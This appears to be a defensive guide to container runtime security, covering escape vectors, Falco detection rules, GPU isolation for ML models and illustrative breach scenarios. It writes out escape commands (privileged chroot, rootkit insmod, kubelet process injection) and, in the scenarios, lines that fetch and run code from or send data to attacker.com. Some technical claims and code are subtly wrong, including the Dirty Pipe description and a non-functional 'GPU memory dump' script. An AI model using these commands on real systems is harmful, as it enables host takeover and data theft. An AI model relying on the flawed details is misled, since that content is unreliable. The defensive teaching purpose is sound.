Why running containers in production requires runtime monitoring, how container escapes work, securing AI/ML workloads with GPU isolation, and detecting breakouts before data exfiltration.
Container security doesn’t stop at image scanning and network isolation. Once containers are running, new attack vectors emerge: privileged mode exploitation, Docker socket abuse, kernel vulnerabilities, and specialized threats like AI model theft from GPU-accelerated containers.
In pharmaceutical production environments running machine learning workloads on AKS with GPU node pools, runtime security means protecting both infrastructure (preventing container escapes) and intellectual property (securing proprietary AI models worth millions in R&D investment). A container escape can expose the entire Kubernetes cluster. A poorly isolated GPU container can leak AI models to adjacent workloads.
This guide covers container runtime security across two critical domains: escape techniques attackers use to break out of containers, and specialized security for AI/ML workloads requiring GPU access.
Part 1: Container Escape Techniques
A container escape occurs when a process inside a container gains access to the host system. Attackers use container escapes to:
- Access other containers’ data
- Steal Kubernetes service account tokens
- Install persistent backdoors on the host
- Pivot to other nodes in the cluster
Escape Vector #1: Privileged Containers
Containers running with --privileged flag have all Linux capabilities and access to host devices. This is functionally equivalent to root access to the underlying host.
How it works:
# Inside privileged container
mount /dev/sda1 /mnt
# Now have full access to host filesystem
cat /mnt/etc/shadow # Host password hashes
cat /mnt/root/.ssh/id_rsa # SSH keys
Real exploit (CVE-2019-5736):
RunC vulnerability allowed privileged containers to overwrite host’s runc binary. Next container start executed attacker’s code as root on host.
Detection:
# Check if container is privileged
docker inspect <container> | grep '"Privileged": true'
# Kubernetes - check pod security context
kubectl get pod <pod> -o jsonpath='{.spec.containers[*].securityContext.privileged}'
Prevention:
- Never use
--privilegedin production - If privileged mode is absolutely required, use Pod Security Standards to restrict to specific namespaces
- Drop all capabilities by default, add only what’s needed
Escape Vector #2: Docker Socket Mounted
Mounting /var/run/docker.sock inside a container gives that container full control over Docker daemon—including ability to start privileged containers.
How it works:
# Inside container with Docker socket mounted
docker run --privileged -v /:/host alpine chroot /host /bin/bash
# Now have root shell on host
Why this is common: CI/CD tools (Jenkins, GitLab Runner) often mount Docker socket to build images. This is a critical security risk.
Detection with Falco:
# Falco rule detecting Docker socket access
- rule: Docker Socket Access
desc: Detect access to Docker socket from container
condition: >
open_write and container and
fd.name=/var/run/docker.sock
output: "Docker socket accessed (user=%user.name container=%container.name)"
priority: CRITICAL
Safer alternatives:
- Kaniko: Build images without Docker daemon
- Buildah: Rootless container builds
- Docker-in-Docker (dind): Isolated Docker daemon per container (higher resource usage)
Escape Vector #3: CAP_SYS_ADMIN Kernel Module Loading
Containers with CAP_SYS_ADMIN capability can load kernel modules, mount filesystems, and perform other privileged operations.
How it works:
# Inside container with CAP_SYS_ADMIN
insmod /tmp/rootkit.ko
# Malicious kernel module now running on host
CVE-2022-0847 (Dirty Pipe):
Kernel vulnerability allowing arbitrary file writes via /proc/self/mem. Containers with CAP_SYS_ADMIN could exploit this to overwrite host files.
Detection:
# Falco rule detecting kernel module loading
- rule: Kernel Module Load
desc: Detect kernel module loading from container
condition: >
syscall.type=init_module and container
output: "Kernel module loaded from container (module=%proc.args container=%container.name)"
priority: CRITICAL
Prevention:
# Drop CAP_SYS_ADMIN
services:
app:
cap_drop:
- ALL
# Only add specific capabilities needed
Escape Vector #4: Host PID Namespace
Containers sharing host PID namespace can see and interact with host processes.
How it works:
# Run container with host PID namespace
docker run --pid=host alpine
# Inside container
ps aux # Can see ALL host processes
kill -9 <host-process-pid> # Can kill host processes
Why this is dangerous: Container can inject code into host processes, steal credentials from process memory, or cause denial of service.
Detection:
# Check if container uses host PID namespace
docker inspect <container> | grep '"PidMode": "host"'
Prevention:
- Never use
--pid=hostin production - Kubernetes Pod Security Standards block this by default at “Baseline” level
Escape Vector #5: Exposed Host Filesystem Mounts
Mounting sensitive host directories gives containers direct access to host configuration, credentials, and data.
Dangerous mounts:
/:/host– Entire host filesystem/etc:/host-etc– Host configuration (SSH keys, password hashes)/var/run:/var/run– Docker socket, other sensitive sockets/proc:/host-proc– Host process information/sys:/host-sys– Host kernel interfaces
Exploit example:
# Container with /etc mounted
docker run -v /etc:/host-etc alpine
# Inside container
cat /host-etc/shadow # Steal password hashes
cp /tmp/malicious-cron /host-etc/cron.d/backdoor # Install persistence
Detection with Falco:
# Falco rule detecting sensitive host mounts
- rule: Sensitive Host Mount
desc: Detect container mounting sensitive host directories
condition: >
container and
(fd.name startswith /host-etc or
fd.name startswith /host-root or
fd.name=/var/run/docker.sock)
output: "Sensitive host directory accessed (path=%fd.name container=%container.name)"
priority: WARNING
Prevention:
- Never mount sensitive host paths unless absolutely required
- Use read-only mounts when possible:
-v /etc:/etc:ro - Prefer copying files into image over mounting at runtime
[IMAGE: Diagram showing 5 escape vectors with attack flow: Privileged → Host access, Docker socket → New privileged container, CAP_SYS_ADMIN → Kernel module, Host PID → Process injection, Host mounts → File access]
Runtime Security Monitoring with Falco
Falco detects runtime anomalies by monitoring syscalls, file access, network connections, and process execution.
Installing Falco (Kubernetes)
# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# Install Falco with default rules
helm install falco falcosecurity/falco \
--namespace falco \
--create-namespace \
--set tty=true
Key Falco Rules for Container Escapes
# Detect shell spawned in container
- rule: Terminal Shell in Container
desc: A shell was spawned in a container
condition: >
spawned_process and container and
proc.name in (bash, sh, zsh)
output: "Shell spawned in container (user=%user.name container=%container.name)"
priority: WARNING
# Detect file writes outside expected paths
- rule: Write Below Root
desc: Container writing to sensitive host paths
condition: >
open_write and container and
fd.name startswith /
output: "File write in sensitive location (file=%fd.name container=%container.name)"
priority: WARNING
# Detect privilege escalation
- rule: Set Setuid or Setgid Bit
desc: Detect setting setuid/setgid bit
condition: >
syscall.type=chmod and
(evt.arg.mode contains S_ISUID or evt.arg.mode contains S_ISGID)
output: "Setuid/setgid bit set (file=%evt.arg.filename user=%user.name)"
priority: CRITICAL
[IMAGE: Screenshot of Falco alert output showing container escape attempt detection]
Part 2: AI Model Container Security
AI/ML workloads introduce unique security challenges: GPU access requirements, model intellectual property protection, and multi-tenant GPU sharing risks.
The AI Model Security Problem
Pharmaceutical companies invest millions in AI model development:
- Drug discovery models trained on proprietary molecular datasets
- Clinical trial outcome prediction models
- Radiology image analysis models (FDA-approved medical devices)
If an attacker gains access to a container running inference, they can:
- Extract model weights: Reverse-engineer the model architecture and parameters
- Steal training data: Use model inversion attacks to reconstruct training samples
- Exfiltrate via GPU memory: Access GPU memory shared between containers
GPU Isolation Challenges
NVIDIA GPUs use shared memory architecture. Without proper isolation:
- Container A can read GPU memory written by Container B
- Malicious container can dump entire GPU memory to find model weights
- Multi-Instance GPU (MIG) provides hardware isolation but not all GPUs support it
Securing GPU Workloads
1. Use NVIDIA MIG (Multi-Instance GPU):
# Enable MIG on A100 GPU
nvidia-smi -i 0 -mig 1
# Create GPU instances
nvidia-smi mig -cgi 9,9,9,9,9,9,9 -C
# Assign to container
docker run --gpus '"device=0:0"' pytorch-model
MIG creates hardware-isolated GPU slices. Container A cannot access Container B’s GPU memory.
2. Encrypted Model Storage:
# Load encrypted model
from cryptography.fernet import Fernet
# Decrypt model in memory only
key = os.environ['MODEL_ENCRYPTION_KEY'] # From Kubernetes secret
cipher = Fernet(key)
with open('model.encrypted', 'rb') as f:
encrypted_model = f.read()
model_bytes = cipher.decrypt(encrypted_model)
model = torch.load(io.BytesIO(model_bytes))
# Model never written to disk unencrypted
3. Restrict GPU Container Capabilities:
# docker-compose.yml for GPU workload
services:
ml-inference:
image: pytorch-gpu:latest
runtime: nvidia
environment:
- NVIDIA_VISIBLE_DEVICES=0
cap_drop:
- ALL
cap_add:
- CHOWN # Only if needed for file permissions
read_only: true
tmpfs:
- /tmp
security_opt:
- no-new-privileges:true
- apparmor=docker-default
4. Monitor GPU Memory Access:
# Monitor GPU memory usage
nvidia-smi dmon -s um -c 1
# Detect unusual memory patterns
# Sudden spikes may indicate memory dumping attacks
[IMAGE: Diagram showing GPU isolation: Without MIG (shared memory, cross-container access) vs. With MIG (hardware partitions, isolated memory)]
Production Failure Scenarios
Scenario 1: CI/CD Container Escape via Docker Socket
The Setup: A pharmaceutical company’s Jenkins CI/CD pipeline ran inside Kubernetes. To build Docker images, Jenkins pods mounted the host’s Docker socket.
The Failure: A developer’s compromised credentials allowed attackers to submit a malicious Jenkins job:
// Malicious Jenkinsfile
node {
sh '''
docker run --privileged -v /:/host alpine sh -c "
chroot /host /bin/bash -c '
curl http://attacker.com/backdoor.sh | bash
cp /root/.ssh/id_rsa /tmp/stolen_key
'
"
'''
}
Because Jenkins pod had Docker socket access, the malicious job:
- Started a privileged container
- Mounted entire host filesystem
- Installed persistent backdoor
- Stole SSH keys from all Kubernetes nodes
Attackers gained cluster-wide access, exfiltrated kubeconfig files, and accessed all application secrets.
What Should Have Been Done: Use Kaniko for image builds (no Docker socket required):
# Kubernetes pod using Kaniko
apiVersion: v1
kind: Pod
spec:
containers:
- name: kaniko
image: gcr.io/kaniko-project/executor:latest
args:
- "--dockerfile=Dockerfile"
- "--context=git://github.com/user/repo"
- "--destination=myregistry/image:tag"
# NO Docker socket mount
Impact: Complete Kubernetes cluster compromise, 8 nodes, 200+ production workloads accessed, patient data exposure investigation (no exfiltration confirmed), $1.8M incident response, CISO replacement.
Key Lesson: Mounting the Docker socket is functionally equivalent to giving root SSH access. Use rootless build tools like Kaniko or Buildah.
Scenario 2: AI Model Theft via GPU Memory Dumping
The Setup: A biotech company ran drug discovery AI models on Kubernetes with NVIDIA T4 GPUs (no MIG support). Multiple research teams shared GPU nodes.
The Failure: A contractor with legitimate access deployed a malicious container that dumped GPU memory:
# Malicious container code
import torch
import numpy as np
# Allocate GPU memory
device = torch.device('cuda')
# Dump entire GPU memory range
gpu_memory_dump = []
for offset in range(0, 16_000_000_000, 1_000_000): # 16GB GPU
try:
# Read GPU memory at offset
data = torch.cuda.mem_get_info(offset)
gpu_memory_dump.append(data)
except:
pass
# Exfiltrate to external server
requests.post('http://attacker.com/exfil', json={'data': gpu_memory_dump})
GPU memory contained:
- Model weights from adjacent team’s FDA-submitted AI medical device
- Proprietary molecular structure embeddings
- Training data samples (patient X-rays – HIPAA violation)
What Should Have Been Done:
- Use MIG-capable GPUs: A100 instead of T4 for multi-tenant workloads
- Dedicated GPU nodes per team: Node taints/tolerations to prevent co-location
- Model encryption: Encrypt model weights, decrypt only in GPU memory during inference
# Kubernetes - dedicated GPU node pool per team
apiVersion: v1
kind: Node
metadata:
labels:
team: drug-discovery
gpu: nvidia-a100-mig
spec:
taints:
- key: dedicated
value: drug-discovery
effect: NoSchedule
Impact: $4.2M model theft (competitor filed similar patent 6 months later), HIPAA breach (training data in GPU memory), FDA review of AI device security, loss of competitive advantage.
Scenario 3: Privileged Container Kernel Module Backdoor
The Setup: A fintech platform ran network monitoring containers in privileged mode to access raw network interfaces.
The Failure: Application vulnerability allowed RCE in monitoring container. Attacker exploited privileged mode to load kernel rootkit:
# Inside privileged monitoring container
insmod /tmp/diamorphine.ko
# Kernel rootkit installed - hides processes, network connections, files
Rootkit provided:
- Hidden processes (invisible to ps, top, Kubernetes metrics)
- Hidden network connections (backdoor port not visible to netstat)
- Hidden files (exfiltrated data not shown in du, ls)
Attackers maintained access for 87 days undetected.
What Should Have Been Done:
- Drop privileged mode: Use CAP_NET_RAW + CAP_NET_ADMIN instead
- Enable Falco: Detect kernel module loading
- Kernel lockdown mode: Prevent runtime module loading
# Secure network monitoring container
services:
network-monitor:
image: network-monitor:latest
cap_drop:
- ALL
cap_add:
- NET_RAW # Packet capture
- NET_ADMIN # Network configuration
# NOT privileged
Impact: 87 days of undetected access, complete network traffic capture (TLS certificates, API keys, customer PII), SOC 2 audit failure, $2.1M forensic analysis, customer breach notifications.
Key Lesson: Privileged mode should never be used. CAP_NET_RAW + CAP_NET_ADMIN provide network access without kernel module loading capability.
Scenario 4: Host PID Namespace Process Injection
The Setup: A SaaS platform ran debugging sidecars with --pid=host to troubleshoot customer application crashes.
The Failure: Customer uploaded malicious code that gained access to debugging sidecar. With host PID namespace:
# Inside container with --pid=host
ps aux | grep kubelet
# Find kubelet PID: 1234
# Inject into kubelet process
gdb -p 1234
(gdb) call dlopen("/tmp/malicious.so", 2)
# Malicious library now running inside kubelet
Injected code into kubelet process:
- Intercepted all pod creation requests
- Stole Kubernetes secrets from environment variables
- Exfiltrated service account tokens
What Should Have Been Done: Never use --pid=host. Use kubectl debug instead:
# Kubernetes ephemeral debugging container (isolated PID namespace)
kubectl debug <pod> -it --image=busybox --target=<container>
Impact: Kubernetes cluster compromise, access to all namespaces, 40+ customer environments accessed, class-action lawsuit, $3.4M settlement, platform architecture redesign.
Scenario 5: Escape via /proc/self Exploitation
The Setup: Healthcare platform ran containers without AppArmor enforcement. Kernel vulnerability (CVE-2022-0847 Dirty Pipe) allowed writing to arbitrary files via /proc/self/mem.
The Failure: Attacker exploited path traversal vulnerability, then used Dirty Pipe to overwrite host cron:
# Inside container (no AppArmor)
# Exploit writes to /proc/self/mem
# Overwrites /host-mounted-path/../../../etc/cron.d/backdoor
# Host cron now runs attacker's code every minute
* * * * * root curl http://attacker.com/beacon
What Should Have Been Done: Enable AppArmor with Docker’s default profile:
services:
app:
security_opt:
- apparmor=docker-default
- no-new-privileges:true
AppArmor blocks access to /proc/self/mem and other kernel interfaces used in container escapes.
Impact: HIPAA breach (192,000 patient records), HHS OCR investigation, $2.3M fine, mandatory AppArmor enforcement across all workloads, complete infrastructure audit.
[IMAGE: Attack timeline diagram for each scenario showing: Initial compromise → Escape technique → Lateral movement → Exfiltration → Detection (or lack thereof)]
Defense in Depth for Runtime Security
Layer 1: Prevent Escapes
- Never use
--privileged - Drop all capabilities, add only what’s needed
- Enable AppArmor/SELinux
- Use read-only root filesystems
- Avoid Docker socket mounts
- Never use host PID/IPC/network namespaces
Layer 2: Detect Anomalies
- Deploy Falco for runtime monitoring
- Monitor syscalls, file access, network connections
- Alert on shell spawns in production containers
- Detect kernel module loading attempts
- Log all privilege escalation attempts
Layer 3: Limit Blast Radius
- Network segmentation (isolate tiers)
- Secrets rotation (limit token lifetime)
- Pod Security Standards (enforce at namespace level)
- RBAC (least privilege for service accounts)
- Audit logging (immutable logs for forensics)
Layer 4: AI/ML Specific
- Use MIG for GPU isolation
- Encrypt model weights at rest and in transit
- Dedicated GPU nodes per team/project
- Monitor GPU memory access patterns
- Implement model watermarking (detect theft)
Key Takeaways
- Container escapes exploit privileged mode, Docker socket access, capabilities, and kernel vulnerabilities
- Falco provides runtime threat detection by monitoring syscalls and detecting anomalous behavior
- Docker socket mounting is equivalent to root access—use Kaniko, Buildah, or isolated dind instead
- CAP_SYS_ADMIN enables kernel module loading—never grant this capability in production
- AppArmor and SELinux block entire classes of escapes by restricting kernel interface access
- AI/ML workloads require GPU isolation—use NVIDIA MIG or dedicated nodes to prevent model theft
- Model encryption protects IP even if container is compromised—decrypt only in GPU memory
- Defense in depth combines prevention, detection, and blast radius limitation
Runtime security is where theoretical threats become real incidents. Image scanning finds vulnerabilities in packages. Network policies restrict traffic. But runtime monitoring detects when an attacker is actively exploiting a vulnerability, attempting to escape, or exfiltrating data. For AI/ML workloads worth millions in R&D investment, specialized GPU isolation and model encryption are not optional—they’re mandatory protection for intellectual property.
Previous: Network Isolation & Segmentation for Multi-Tier Architectures
Next: Production Docker Debugging Handbook
Hands-on labs:
- Lab 06: AI Model Container Security — Secure GPU workloads, implement MIG isolation, encrypt models
- Lab 09: Container Runtime Escape Prevention — Practice escape techniques, deploy Falco, test detection